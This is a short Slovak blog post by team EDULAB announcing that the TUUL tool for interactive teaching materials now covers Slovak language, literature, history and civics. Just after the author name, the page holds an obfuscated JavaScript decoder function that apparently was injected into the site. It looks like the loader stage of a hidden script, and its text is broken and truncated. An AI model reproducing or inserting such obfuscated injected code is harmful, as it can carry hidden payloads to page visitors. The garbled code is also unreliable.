BLOG

Nové predmety v TUULe

 
janosifunction h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q94);na=((y3&15)2);pc=((w4&3)=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6

Z TUULu sa v poslednej dobe stal veľmi obľúbený nástroj na tvorbu interaktívnych materiálov využiteľných nielen na vyučovacích hodinách v škole. Veľa učiteľov ale i žiakov ho využíva ako zdroj materiálov, inšpirácie, metód a pohľadov na rôznu problematiku.

Z tohto dôvodu máme pre všetkých používateľov TUULu radostnú správu. Vypočuli sme hlas odbornej učiteľskej verejnosti a TUUL sa rozširuje o ďalšie predmety. K prírodovedným predmetom – matematika, fyzika, chémia, biológia a geografia pribudli nasledovné predmety: slovenský jazyk, literatúra, dejepis a občianska náuka.

Veríme, že tak ako pribudli predmety, pribudnú i ďalší aktívni používatelia tohto praktického nástroja a spolu s nimi aj ďalšie TUULy.

tím EDULAB